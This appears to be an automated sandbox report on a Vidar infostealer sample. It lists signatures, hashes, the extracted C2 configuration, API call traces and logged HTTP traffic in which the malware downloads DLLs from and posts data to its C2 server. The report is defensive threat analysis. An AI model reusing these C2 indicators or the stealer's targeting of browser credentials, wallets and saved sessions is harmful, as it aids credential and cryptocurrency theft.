Windows Analysis Report
7ZthFNAqYp.exe

Overview

General Information

Sample name:	7ZthFNAqYp.exe renamed because original name is a hash value
Original sample name:	6733924c670207ed7755dc0fe2286c36.exe
Analysis ID:	1539807
MD5:	6733924c670207ed7755dc0fe2286c36
SHA1:	2fea9c1b0c3b0a923232dbcadcfc661bb08031d0
SHA256:	a555018ed03a0b191f64f625b75cebd9f62c194c7b1c1a66b91266f2f1c1b6c4
Tags:	32exetrojan
Infos:

Detection

Vidar

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Detected unpacking (creates a PE file in dynamic memory)

Found malware configuration

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected AntiVM3

Yara detected Powershell download and execute

Yara detected Vidar

Yara detected Vidar stealer

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Contains functionality to inject code into remote processes

Drops large PE files

Found many strings related to Crypto-Wallets (likely being stolen)

Injects a PE file into a foreign processes

Searches for specific processes (likely to inject)

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to harvest and steal Bitcoin Wallet information

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Crypto Currency Wallets

AV process strings found (often used to terminate AV products)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to detect sandboxes (mouse cursor move detection)

Contains functionality to dynamically determine API calls

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality to record screenshots

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Detected potential crypto function

Drops PE files

Drops PE files to the application program directory (C:\ProgramData)

Extensive use of GetProcAddress (often used to hide API calls)

Found dropped PE file which has not been started or loaded

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

Launches processes in debugging mode, may be used to hinder debugging

PE file contains an invalid checksum

PE file contains executable resources (Code or Archives)

PE file contains sections with non-standard names

Queries information about the installed CPU (vendor, model number etc)

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Sigma detected: CurrentVersion Autorun Keys Modification

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses the keyboard layout for branch decision (may execute only for specific keyboard layouts)

Yara detected Credential Stealer

Classification

Malware Threat Intel
Provided by

Name	Description	Attribution	Blogpost URLs	Link
Vidar	Vidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser.	No Attribution	https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-1-(-Unpacking-)/ https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-2/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/vidar-stealer-h-and-m-campaign https://0xtoxin.github.io/malware%20analysis/Vidar-Stealer-Campaign/ https://asec.ahnlab.com/en/22932/	https://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

Signatures

AV Detection

Antivirus / Scanner detection for submitted sample

Source: 7ZthFNAqYp.exe

Avira: detected

Found malware configuration

Source: 00000002.00000002.3393003879.0000000000920000.00000040.00000400.00020000.00000000.sdmp

Malware Configuration Extractor: Vidar {"C2 url": ["https://steamcommunity.com/profiles/76561199786602107", "https://t.me/fun88rockskek"], "Botnet": "65158feadb3cebfa5c9a9e36f0d461fe"}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\Music\AttoDesignerUpdater\AttoConvertVideo.exe

ReversingLabs: Detection: 15%

Multi AV Scanner detection for submitted file

Source: 7ZthFNAqYp.exe	ReversingLabs: Detection: 44%
Source: 7ZthFNAqYp.exe	Virustotal: Detection: 44%			Perma Link

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 99.9% probability

Uses Microsoft's Enhanced Cryptographic Provider

Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: 2_2_009280A1 CryptUnprotectData,LocalAlloc,LocalFree,	2_2_009280A1
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: 2_2_00928048 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,	2_2_00928048
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: 2_2_00931E32 CryptBinaryToStringA,GetProcessHeap,HeapAlloc,CryptBinaryToStringA,	2_2_00931E32
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: 2_2_0092A7AD _memset,lstrlenA,CryptStringToBinaryA,PK11_GetInternalKeySlot,PK11_Authenticate,PK11SDR_Decrypt,_memmove,lstrcatA,PK11_FreeSlot,lstrcatA,	2_2_0092A7AD
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: 2_2_6CB0A9A0 PK11SDR_Decrypt,PORT_NewArena_Util,SEC_QuickDERDecodeItem_Util,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,PK11_GetInternalKeySlot,PK11_Authenticate,PORT_FreeArena_Util,PK11_ListFixedKeysInSlot,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PK11_FreeSymKey,PORT_FreeArena_Util,PK11_FreeSymKey,SECITEM_ZfreeItem_Util,	2_2_6CB0A9A0
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: 2_2_6CB044C0 PK11_PubEncrypt,	2_2_6CB044C0
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: 2_2_6CAD4420 SECKEY_DestroyEncryptedPrivateKeyInfo,memset,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,SECITEM_ZfreeItem_Util,SECITEM_ZfreeItem_Util,free,	2_2_6CAD4420
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: 2_2_6CB04440 PK11_PrivDecrypt,	2_2_6CB04440
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: 2_2_6CB525B0 PK11_Encrypt,memcpy,PR_SetError,PK11_Encrypt,	2_2_6CB525B0
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: 2_2_6CAEE6E0 PK11_AEADOp,TlsGetValue,EnterCriticalSection,PORT_Alloc_Util,PK11_Encrypt,PORT_Alloc_Util,memcpy,memcpy,PR_SetError,PR_SetError,PR_Unlock,PR_SetError,PR_Unlock,PK11_Decrypt,PR_GetCurrentThread,PK11_Decrypt,PK11_Encrypt,memcpy,memcpy,PR_SetError,free,	2_2_6CAEE6E0
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: 2_2_6CAE8670 PK11_ExportEncryptedPrivKeyInfo,	2_2_6CAE8670
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: 2_2_6CB0A650 PK11SDR_Encrypt,PORT_NewArena_Util,PK11_GetInternalKeySlot,PK11_Authenticate,SECITEM_ZfreeItem_Util,TlsGetValue,EnterCriticalSection,PR_Unlock,PK11_CreateContextBySymKey,PK11_GetBlockSize,PORT_Alloc_Util,memcpy,SECITEM_ZfreeItem_Util,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PORT_ArenaAlloc_Util,PK11_CipherOp,SEC_ASN1EncodeItem_Util,SECITEM_ZfreeItem_Util,PORT_FreeArena_Util,PK11_DestroyContext,	2_2_6CB0A650
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: 2_2_6CB2A730 SEC_PKCS12AddCertAndKey,PORT_ArenaMark_Util,PORT_ArenaMark_Util,PK11_FindKeyByAnyCert,SECKEY_DestroyPrivateKey,PORT_ArenaAlloc_Util,PR_SetError,PR_SetError,PK11_GetInternalKeySlot,PK11_FindKeyByAnyCert,SECKEY_DestroyPrivateKey,PORT_ArenaAlloc_Util,SECKEY_DestroyEncryptedPrivateKeyInfo,strlen,PR_SetError,PORT_FreeArena_Util,PORT_FreeArena_Util,PORT_ArenaAlloc_Util,PR_SetError,	2_2_6CB2A730
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: 2_2_6CB30180 SECMIME_DecryptionAllowed,SECOID_GetAlgorithmTag_Util,	2_2_6CB30180
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: 2_2_6CB043B0 PK11_PubEncryptPKCS1,PR_SetError,	2_2_6CB043B0
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: 2_2_6CB27C00 SEC_PKCS12DecoderImportBags,PR_SetError,NSS_OptionGet,CERT_DestroyCertificate,SECITEM_ZfreeItem_Util,PR_SetError,SECKEY_DestroyPublicKey,SECITEM_ZfreeItem_Util,PR_SetError,SECKEY_DestroyPublicKey,SECITEM_ZfreeItem_Util,PR_SetError,SECOID_FindOID_Util,SECITEM_ZfreeItem_Util,SECKEY_DestroyPublicKey,SECOID_GetAlgorithmTag_Util,SECITEM_CopyItem_Util,PK11_ImportEncryptedPrivateKeyInfoAndReturnKey,SECITEM_ZfreeItem_Util,SECKEY_DestroyPublicKey,PK11_ImportPublicKey,SECOID_FindOID_Util,	2_2_6CB27C00
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: 2_2_6CB2BD30 SEC_PKCS12IsEncryptionAllowed,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,	2_2_6CB2BD30
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: 2_2_6CAE7D60 PK11_ImportEncryptedPrivateKeyInfoAndReturnKey,SECOID_FindOID_Util,SECOID_FindOIDByTag_Util,PK11_PBEKeyGen,PK11_GetPadMechanism,PK11_UnwrapPrivKey,PK11_FreeSymKey,SECITEM_ZfreeItem_Util,PK11_PBEKeyGen,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PK11_ImportPublicKey,SECKEY_DestroyPublicKey,	2_2_6CAE7D60
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: 2_2_6CB29EC0 SEC_PKCS12CreateUnencryptedSafe,PORT_ArenaMark_Util,PORT_ArenaAlloc_Util,PR_SetError,PR_SetError,SEC_PKCS7DestroyContentInfo,	2_2_6CB29EC0
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: 2_2_6CB03FF0 PK11_PrivDecryptPKCS1,	2_2_6CB03FF0

Compliance

Detected unpacking (creates a PE file in dynamic memory)

Source: C:\Users\user\Desktop\7ZthFNAqYp.exe

Unpacked PE file: 2.2.7ZthFNAqYp.exe.20020000.4.unpack

Uses 32bit PE files

Source: 7ZthFNAqYp.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.6:49940 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.192.247.89:443 -> 192.168.2.6:49988 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 95.217.220.103:443 -> 192.168.2.6:49989 version: TLS 1.2

Source:	Binary string: mozglue.pdbP source: 7ZthFNAqYp.exe, 00000002.00000002.3417459044.000000006FD7D000.00000002.00000001.01000000.00000008.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3404341759.00000000266F2000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: freebl3.pdb source: 7ZthFNAqYp.exe, 00000002.00000002.3402404938.000000002078F000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.2.dr
Source:	Binary string: freebl3.pdbp source: 7ZthFNAqYp.exe, 00000002.00000002.3402404938.000000002078F000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.2.dr
Source:	Binary string: nss3.pdb@ source: 7ZthFNAqYp.exe, 00000002.00000002.3412588764.000000003E4BB000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3417188068.000000006CBDF000.00000002.00000001.01000000.00000007.sdmp
Source:	Binary string: softokn3.pdb@ source: 7ZthFNAqYp.exe, 00000002.00000002.3408547373.00000000325D8000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: 7ZthFNAqYp.exe, 00000002.00000002.3410535288.0000000038547000.00000004.00000020.00020000.00000000.sdmp, vcruntime140.dll.2.dr
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: 7ZthFNAqYp.exe, 00000002.00000002.3406548089.000000002C66D000.00000004.00000020.00020000.00000000.sdmp, msvcp140.dll.2.dr
Source:	Binary string: nss3.pdb source: 7ZthFNAqYp.exe, 00000002.00000002.3412588764.000000003E4BB000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3417188068.000000006CBDF000.00000002.00000001.01000000.00000007.sdmp
Source:	Binary string: mozglue.pdb source: 7ZthFNAqYp.exe, 00000002.00000002.3417459044.000000006FD7D000.00000002.00000001.01000000.00000008.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3404341759.00000000266F2000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\Dan\Desktop\work\sqlite\tmp\sqlite_bld_dir\2\sqlite3.pdb source: 7ZthFNAqYp.exe, 00000002.00000002.3399631461.000000001A2C4000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3402150620.0000000020238000.00000002.00001000.00020000.00000000.sdmp
Source:	Binary string: softokn3.pdb source: 7ZthFNAqYp.exe, 00000002.00000002.3408547373.00000000325D8000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: d:\dev\sw\hbautil\source\windows\bench32\Release\Bench32.exe.pdb source: 7ZthFNAqYp.exe, AttoConvertVideo.exe.0.dr

Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: 2_2_00936013 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	2_2_00936013
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: 2_2_00929CF1 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	2_2_00929CF1
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: 2_2_0093547D wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose,	2_2_0093547D
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: 2_2_0092D59B FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	2_2_0092D59B
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: 2_2_00921D80 FindFirstFileA,StrCmpCA,StrCmpCA,FindFirstFileA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	2_2_00921D80
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: 2_2_0092B5B4 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	2_2_0092B5B4
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: 2_2_00934D08 wsprintfA,FindFirstFileA,_memset,_memset,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,_memset,lstrcatA,strtok_s,strtok_s,_memset,lstrcatA,strtok_s,PathMatchSpecA,DeleteFileA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,strtok_s,strtok_s,FindNextFileA,FindClose,	2_2_00934D08
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: 2_2_0092BF22 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,	2_2_0092BF22
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: 2_2_0092B914 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	2_2_0092B914
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: 2_2_00935B4D GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcatA,lstrcatA,lstrlenA,lstrlenA,	2_2_00935B4D
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: 2_2_0092CD0C wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,DeleteFileA,CopyFileA,FindNextFileA,FindClose,	2_2_0092CD0C

Source: C:\Users\user\Desktop\7ZthFNAqYp.exe

Code function: 2_2_00935182 GetLogicalDriveStringsA,_memset,GetDriveTypeA,lstrcpyA,lstrcpyA,lstrcpyA,lstrlenA,

2_2_00935182

Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\	Jump to behavior
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\	Jump to behavior
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\	Jump to behavior
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\	Jump to behavior
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\	Jump to behavior
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\	Jump to behavior

Found inlined nop instructions (likely shell or obfuscated code)

Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: 4x nop then mov eax, dword ptr fs:[00000030h]		2_2_009214AD
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: 4x nop then mov dword ptr [ebp-04h], eax		2_2_009214AD

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2049087 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST : 192.168.2.6:49993 -> 95.217.220.103:443
Source: Network traffic	Suricata IDS: 2051831 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1 : 95.217.220.103:443 -> 192.168.2.6:49993
Source: Network traffic	Suricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 95.217.220.103:443 -> 192.168.2.6:49992

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: https://steamcommunity.com/profiles/76561199786602107
Source: Malware configuration extractor	URLs: https://t.me/fun88rockskek

HTTP GET or POST without a user agent

Source: global traffic	HTTP traffic detected: GET /fun88rockskek HTTP/1.1Host: t.meConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /profiles/76561199786602107 HTTP/1.1Host: steamcommunity.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 107.191.36.218Connection: Keep-AliveCache-Control: no-cache

IP address seen in connection with other malware

Source: Joe Sandbox View	IP Address: 23.192.247.89 23.192.247.89
Source: Joe Sandbox View	IP Address: 149.154.167.99 149.154.167.99
Source: Joe Sandbox View	IP Address: 149.154.167.99 149.154.167.99

Internet Provider seen in connection with other malware

Source: Joe Sandbox View	ASN Name: AKAMAI-ASUS AKAMAI-ASUS
Source: Joe Sandbox View	ASN Name: HETZNER-ASDE HETZNER-ASDE
Source: Joe Sandbox View	ASN Name: TELEGRAMRU TELEGRAMRU

JA3 SSL client fingerprint seen in connection with other malware

Source: Joe Sandbox View	JA3 fingerprint: 51c64c77e60f3980eea90869b68c58a8
Source: Joe Sandbox View	JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Suricata IDS alerts with low severity for network traffic

Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:49990 -> 95.217.220.103:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:49992 -> 95.217.220.103:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:49994 -> 95.217.220.103:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:49989 -> 95.217.220.103:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:49991 -> 95.217.220.103:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:49995 -> 95.217.220.103:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:50000 -> 95.217.220.103:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:50002 -> 95.217.220.103:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:50001 -> 95.217.220.103:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:50003 -> 95.217.220.103:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:49997 -> 95.217.220.103:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:49993 -> 95.217.220.103:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:50004 -> 95.217.220.103:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:50006 -> 95.217.220.103:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:50007 -> 95.217.220.103:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:50005 -> 95.217.220.103:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:50008 -> 95.217.220.103:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:50010 -> 95.217.220.103:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:50011 -> 95.217.220.103:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:50013 -> 95.217.220.103:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:50014 -> 95.217.220.103:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:50009 -> 95.217.220.103:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:50012 -> 95.217.220.103:443

Uses a known web browser user agent for HTTP communication

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 95.217.220.103Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----KEGDAKEHJDHIDHJJDAECUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 95.217.220.103Content-Length: 255Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----KEGDAKEHJDHIDHJJDAECUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 95.217.220.103Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----DGDAEHCBGIIJJJJKKKEHUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 95.217.220.103Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----CFCBFBGDBKJKECAAKKFHUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 95.217.220.103Content-Length: 332Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----CFIEHCFIECBGCBFHIJJKUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 95.217.220.103Content-Length: 5461Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /sqlp.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 95.217.220.103Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----CFCFHJDBKJKEBFHJEHIIUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 95.217.220.103Content-Length: 829Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----GIIDBGDAFHJDHIDGDGIIUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 95.217.220.103Content-Length: 437Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----EHCFBFBAEBKJKEBGCAEHUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 95.217.220.103Content-Length: 437Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /freebl3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 95.217.220.103Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /mozglue.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 95.217.220.103Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /msvcp140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 95.217.220.103Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /softokn3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 95.217.220.103Connection: Keep-AliveCache-Control: no-cache
